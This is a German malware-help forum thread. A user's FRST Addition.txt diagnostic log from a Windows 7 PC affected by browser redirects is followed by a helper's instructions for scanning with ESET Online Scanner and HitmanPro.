Windows Live Mesh ActiveX Control for Remote Connections (HKLM-x32\...\{C63A1E60-B6A4-440B-89A5-1FC6E4AC1C94}) (Version: 15.4.5722.2 - Microsoft Corporation)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {63450DF1-2C0B-428E-BFAC-EC1022663B86} - System32\Tasks\HPLJCustParticipation => C:\Program Files (x86)\HP\HPLJUT\HPLJUTSCH.exe [2012-06-14] (Hewlett Packard)
Task: {9E499590-0B71-46E5-A0D1-7999EF821021} - System32\Tasks\Fujitsu\DeskUpdate => c:\Fujitsu\Programs\DeskUpdate\ducmd.exe [2015-06-15] (Fujitsu Technology Solutions)
Task: {AF87EE5A-0FFE-4949-B2EC-5914C44C1F2C} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe 
Task: {B28FBEA4-57C7-46AC-99F4-93A8B224A578} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe 
Task: {BD8FF9A2-1BE8-4462-B889-1D0245A1B4C5} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-04-25] (Adobe Systems Incorporated)
Task: {C5AA2588-EC43-4B8A-B1E4-C59182E532A7} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-13] (Adobe Systems Incorporated)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)


==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2012-11-07 06:17 - 2016-02-09 07:41 - 00134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2013-03-27 22:39 - 2010-06-17 21:56 - 00087040 _____ () C:\Windows\System32\redmonnt.dll
2008-10-24 17:35 - 2008-10-24 17:35 - 00128296 _____ () C:\Program Files (x86)\Lexware\AAVUpdateManager\aavus.exe
2013-09-05 01:17 - 2013-09-05 01:17 - 04300456 _____ () C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Cultures\OFFICE.ODF
2016-02-15 19:01 - 2016-01-12 06:43 - 00291264 _____ () C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamBase.dll
2017-05-22 17:34 - 2017-05-09 16:38 - 02270672 _____ () C:\PROGRAM FILES\MALWAREBYTES\MwacLib.dll
2012-01-25 05:00 - 2011-12-15 15:34 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2015-06-22 19:41 - 2016-01-12 06:43 - 00018880 _____ () C:\Program Files (x86)\NVIDIA Corporation\Update Core\detoured.dll
2013-09-05 01:14 - 2013-09-05 01:14 - 04300456 _____ () C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2017-05-25 21:56 - 2017-05-25 21:56 - 00011264 _____ () C:\Users\Markus\AppData\Local\Temp\nspEA5F.tmp\System.dll
2012-02-25 02:37 - 2011-12-16 03:39 - 01198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)

IE restricted site: HKU\.DEFAULT\...\007guard.com -> install.007guard.com
IE restricted site: HKU\.DEFAULT\...\008i.com -> 008i.com
IE restricted site: HKU\.DEFAULT\...\008k.com -> www.008k.com
IE restricted site: HKU\.DEFAULT\...\00hq.com -> www.00hq.com
IE restricted site: HKU\.DEFAULT\...\010402.com -> 010402.com
IE restricted site: HKU\.DEFAULT\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\.DEFAULT\...\0scan.com -> www.0scan.com
IE restricted site: HKU\.DEFAULT\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\.DEFAULT\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\.DEFAULT\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\.DEFAULT\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\.DEFAULT\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\.DEFAULT\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\.DEFAULT\...\10sek.com -> www.10sek.com
IE restricted site: HKU\.DEFAULT\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\.DEFAULT\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\.DEFAULT\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\.DEFAULT\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\.DEFAULT\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\.DEFAULT\...\123simsen.com -> www.123simsen.com

Da befinden sich 7934 mehr Seiten.

IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\007guard.com -> install.007guard.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\008i.com -> 008i.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\008k.com -> www.008k.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\00hq.com -> www.00hq.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\010402.com -> 010402.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\032439.com -> 80gw6ry3i3x3qbrkwhxhw.032439.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\0scan.com -> www.0scan.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1-2005-search.com -> www.1-2005-search.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1-domains-registrations.com -> www.1-domains-registrations.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1000gratisproben.com -> www.1000gratisproben.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\1001namen.com -> www.1001namen.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\100888290cs.com -> mir.100888290cs.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\100sexlinks.com -> www.100sexlinks.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\10sek.com -> www.10sek.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\12-26.net -> user1.12-26.net
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\12-27.net -> user1.12-27.net
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123fporn.info -> www.123fporn.info
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123haustiereundmehr.com -> www.123haustiereundmehr.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123moviedownload.com -> www.123moviedownload.com
IE restricted site: HKU\S-1-5-21-3526156030-524322557-4044303751-1001\...\123simsen.com -> www.123simsen.com

Da befinden sich 7934 mehr Seiten.


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2017-05-05 18:51 - 00000853 _____ C:\Windows\system32\Drivers\etc\hosts


0.0.0.1	mssplus.mcafee.com

==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-3526156030-524322557-4044303751-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Markus\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.188.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [{05211D32-AF63-4CB0-A6B7-B09C94D0B99B}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{71D985ED-FDF0-42DE-9FC4-7C21A11D9FA0}] => (Allow) LPort=2869
FirewallRules: [{E65EEBEE-05F0-4C72-A9EE-0AA508672421}] => (Allow) LPort=1900
FirewallRules: [{9AA5011A-0FCC-4D9D-8784-BD7401D7A24A}] => (Allow) C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe
FirewallRules: [{EE66A64E-5B37-4916-9CC4-D4FBBB548A42}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe
FirewallRules: [{3C0F122C-0742-46E8-AC7F-1C1E9EEBC53E}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [TCP Query User{FE0D6C86-8FFE-4877-8D0D-B0F7F5B00E9B}C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe] => (Allow) C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe
FirewallRules: [UDP Query User{0BA32332-6631-4B2C-B5B3-F4555E347C79}C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe] => (Allow) C:\program files (x86)\lexware\quicksteuer deluxe\2013\steuer.exe
FirewallRules: [TCP Query User{1D9F0CA1-AB5A-4249-8524-86D12D4C7170}C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe] => (Block) C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe
FirewallRules: [UDP Query User{CFD99534-FA56-4434-8213-7F76D477B272}C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe] => (Block) C:\program files (x86)\spyware terminator\spywareterminatorupdate.exe
FirewallRules: [{480E6B07-798E-4A2D-81A6-F92F0CB9EE60}] => (Allow) C:\Program Files (x86)\Lexware\Update Service\Hmg.InstallationService.Service.exe
FirewallRules: [{2A3583E9-7472-4D17-A5D4-47875FB42265}] => (Allow) C:\Program Files (x86)\Lexware\Update Service\Hmg.InstallationService.Service.exe
FirewallRules: [{C41C6DD4-CFFF-4655-874D-5CE44166C462}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\bin\FaxApplications.exe
FirewallRules: [{CE06C567-97E9-467D-80F3-09CC2E7B28DE}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\bin\DigitalWizards.exe
FirewallRules: [{5F4AD41E-6132-4D82-86A4-473BA3D09A0D}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\Bin\HPNetworkCommunicator.exe
FirewallRules: [{2702B751-16F9-48CD-9E49-A21421E09842}] => (Allow) C:\Program Files (x86)\HP\HP LaserJet 200 color MFP M276\bin\EWSProxy.exe
FirewallRules: [{3EB39716-41BA-45F6-AE81-D61AA6F58713}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{67109041-ED86-4F91-8309-D8BD9F30FA0D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
FirewallRules: [{7500E678-5CB9-4385-8912-54B1C9347BE5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{CEDAF5DD-17C1-4B9F-89B2-88A0383795AE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe
FirewallRules: [{2E65A8BF-A7AF-4F73-8D0A-3E85DAFED6C9}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamUserAgent.exe
FirewallRules: [{83D8589A-4A65-4922-BDEA-1DA480FB8729}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{E6FBF0C0-7479-404F-ABB6-8EDD2183B6BE}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{BED2074E-60D7-4BB9-B15E-E4FFED41D21D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{A59E9212-F88E-4BFF-ABE9-AE66ECBF2286}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{6CCE5B8D-1C91-4A2C-88ED-15572F05F895}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{E675A3F9-E1A9-42E5-A350-CF44D1BC3BA8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{64AF72C0-C954-42A9-AD2D-0D552A3F2C5D}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{87A2FE0E-AB34-4C95-B10C-5D9081F3F38B}] => (Allow) C:\Program Files (x86)\Firefox\Firefox.exe

==================== Wiederherstellungspunkte =========================


==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Bluetooth-Peripheriegerät
Description: Bluetooth-Peripheriegerät
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: Bluetooth-Peripheriegerät
Description: Bluetooth-Peripheriegerät
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.

Name: FJ Camera
Description: FJ Camera
Class Guid: {6bdd1fc6-810f-11d0-bec7-08002be2092f}
Manufacturer: Sonix
Service: SNP2UVC
Problem: : Windows cannot start this hardware device because its configuration information (in the registry) is incomplete or damaged. (Code 19)
Resolution: A registry problem was detected.
 This can occur when more than one service is defined for a device, if there is a failure opening the service subkey, or if the driver name cannot be obtained from the service subkey. Try these options:
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.
Click "Uninstall", and then click "Scan for hardware changes" to load a usable driver.

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft-Teredo-Tunneling-Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.

Name: Bluetooth-Peripheriegerät
Description: Bluetooth-Peripheriegerät
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (05/25/2017 09:55:23 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/25/2017 09:32:56 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (05/25/2017 09:23:38 AM) (Source: Avira Secure Backup Crawler) (EventID: 1) (User: )
Description: An error has occurred (COM Error: 80042302 : c:\memopal\client\src\service\shadowcopy\ShadowCopyImpl.h : 353
).

Error: (05/25/2017 09:23:38 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x80040154, Klasse nicht registriert
.


Vorgang:
   VSS-Server wird instanziiert

Error: (05/25/2017 09:23:38 AM) (Source: VSS) (EventID: 22) (User: )
Description: Fehler im Volumenschattenkopie-Dienst: Eine vom Volumenschattenkopie-Dienst benötigte kritische Komponente ist nicht registriert.
Dies kann geschehen, wenn bei der Windows-Installation oder bei der Installation eines Schattenkopieanbieters ein Fehler aufgetreten ist.
Der von CoCreateInstance für die Klasse mit CLSID "{e579ab5f-1cc4-44b4-bed9-de0991ff0623}" und dem Namen "IVssCoordinatorEx2" zurückgegebene Fehler ist [0x80040154, Klasse nicht registriert
].


Vorgang:
   VSS-Server wird instanziiert

Error: (05/25/2017 09:20:07 AM) (Source: Avira Secure Backup Crawler) (EventID: 1) (User: )
Description: An error has occurred (COM Error: 80042302 : c:\memopal\client\src\service\shadowcopy\ShadowCopyImpl.h : 353
).

Error: (05/25/2017 09:20:07 AM) (Source: VSS) (EventID: 8193) (User: )
Description: Volumeschattenkopie-Dienstfehler: Beim Aufrufen von Routine "CoCreateInstance" ist ein unerwarteter Fehler aufgetreten. hr = 0x80040154, Klasse nicht registriert
.


Vorgang:
   VSS-Server wird instanziiert

Error: (05/25/2017 09:20:07 AM) (Source: VSS) (EventID: 22) (User: )
Description: Fehler im Volumenschattenkopie-Dienst: Eine vom Volumenschattenkopie-Dienst benötigte kritische Komponente ist nicht registriert.
Dies kann geschehen, wenn bei der Windows-Installation oder bei der Installation eines Schattenkopieanbieters ein Fehler aufgetreten ist.
Der von CoCreateInstance für die Klasse mit CLSID "{e579ab5f-1cc4-44b4-bed9-de0991ff0623}" und dem Namen "IVssCoordinatorEx2" zurückgegebene Fehler ist [0x80040154, Klasse nicht registriert
].


Vorgang:
   VSS-Server wird instanziiert

Error: (05/25/2017 04:30:00 AM) (Source: System Restore) (EventID: 8193) (User: )
Description: Fehler beim Erstellen des Wiederherstellungspunkts (Prozess = C:\Windows\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation; Beschreibung = Geplanter Prüfpunkt; Fehler = 0x80070422).

Error: (05/24/2017 06:19:33 PM) (Source: Avira Secure Backup Crawler) (EventID: 1) (User: )
Description: An error has occurred (COM Error: 80042302 : c:\memopal\client\src\service\shadowcopy\ShadowCopyImpl.h : 353
).


Systemfehler:
=============
Error: (05/25/2017 09:54:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Bluetooth Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Die Pipe wurde beendet.

Error: (05/25/2017 09:54:55 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Druckwarteschlange" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst konnte wegen einer fehlerhaften Anmeldung nicht gestartet werden.

Error: (05/25/2017 09:54:55 PM) (Source: Service Control Manager) (EventID: 7038) (User: )
Description: Der Dienst "Spooler" konnte sich nicht als "NT AUTHORITY\SYSTEM" mit dem aktuellen Kennwort aufgrund des folgenden Fehlers anmelden: 
Die Anforderung wird nicht unterstützt.


Vergewissern Sie sich, dass der Dienst richtig konfiguriert ist im Dienste-Snap-In in der Microsoft Management Console (MMC).

Error: (05/25/2017 09:54:49 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT)
Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet.

Modulpfad: C:\Windows\System32\IWMSSvc.dll

Error: (05/25/2017 09:54:49 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT)
Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet.

Modulpfad: C:\Windows\System32\IWMSSvc.dll

Error: (05/25/2017 09:54:49 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT)
Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet.

Modulpfad: C:\Windows\System32\IWMSSvc.dll

Error: (05/25/2017 09:54:42 PM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 10003) (User: NT-AUTORITÄT)
Description: Das WLAN-Erweiterungsmodul wurde unerwartet beendet.

Modulpfad: C:\Windows\System32\IWMSSvc.dll

Error: (05/25/2017 09:54:26 PM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Der Versuch des Dienststeuerungs-Managers, nach dem unerwarteten Beenden des Dienstes "Windows Search" Korrekturmaßnahmen (Neustart des Diensts) durchzuführen, ist fehlgeschlagen. Fehler: 
Es wird bereits eine Instanz des Dienstes ausgeführt.

Error: (05/25/2017 09:53:56 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: Dienst "Intel(R) Management and Security Application User Notification Service" wurde unerwartet beendet. Dies ist bereits 1 Mal passiert.

Error: (05/25/2017 09:53:56 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Der Dienst "Windows Media Player-Netzwerkfreigabedienst" wurde unerwartet beendet. Dies ist bereits 1 Mal vorgekommen. Folgende Korrekturmaßnahmen werden in 30000 Millisekunden durchgeführt: Neustart des Diensts.


CodeIntegrity:
===================================
  Date: 2017-05-25 22:01:29.564
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-25 21:55:32.624
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-25 21:43:27.408
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-25 21:33:04.058
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-25 12:55:55.107
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-25 09:13:52.245
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-24 21:28:02.867
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-24 19:31:21.679
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-24 18:59:31.746
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

  Date: 2017-05-24 17:01:37.670
  Description: Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.


==================== Speicherinformationen =========================== 

Prozessor: Intel(R) Core(TM) i7-3610QM CPU @ 2.30GHz
Prozentuale Nutzung des RAM: 30%
Installierter physikalischer RAM: 8087.41 MB
Verfügbarer physikalischer RAM: 5582.78 MB
Summe virtueller Speicher: 16473.01 MB
Verfügbarer virtueller Speicher: 13528.75 MB

==================== Laufwerke ================================

Drive c: (System) (Fixed) (Total:188.51 GB) (Free:107.7 GB) NTFS
Drive e: (Volume) (Fixed) (Total:681.96 GB) (Free:417.12 GB) NTFS
Drive f: () (Removable) (Total:1.91 GB) (Free:1.79 GB) FAT

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 236 GB) (Disk ID: 3EEEC186)
Partition 1: (Active) - (Size=6.2 GB) - (Type=27)
Partition 2: (Not Active) - (Size=229.8 GB) - (Type=05)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 698.6 GB) (Disk ID: 0E5EE332)
Partition 1: (Active) - (Size=2 GB) - (Type=27)
Partition 2: (Not Active) - (Size=696.6 GB) - (Type=OF Extended)

========================================================
Disk: 2 (Size: 1.9 GB) (Disk ID: 6DBE5409)
Partition 1: (Not Active) - (Size=1.9 GB) - (Type=06)

==================== Ende von Addition.txt ============================

burningice · 26.05.2017, 12:26

Schritt: 1

ESET Online Scanner

Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
Lade und starte Eset Online Scanner
Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
Klicke auf Starten.
Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
Klicke am Ende des Suchlaufs auf Fertig stellen.
Schließe das Fenster von ESET.
Explorer öffnen.
C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
Logfile hier posten.
Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset

Hinweis: Dieser Scan kann schon einmal mehrere Stunden dauern...

Schritt: 2
Downloade Dir HitmanPro

auf Deinen Desktop:

HitmanPro-32 Bit Version
HitmanPro-64 Bit Version

Starte die HitmanPro.exe
Klicke auf
Entferne den Haken bei
Klicke auf
und
Akzeptiere die Lizenzbedingungen und klicke auf
Klicke auf

und auf
Wenn der Scan beendet wurde, nichts löschen lassen etc. sondern wähle unten links auf der Button-Leiste
und speichere die Logdatei auf Deinem Desktop.
Schließe HitmanPro und poste mir das Log.

Windows 7 Internet Explorer leitet mich auf Systembooster Homepage Firefox auf SI-Viewer

Log-Analyse und Auswertung: Windows 7 Internet Explorer leitet mich auf Systembooster Homepage Firefox auf SI-Viewer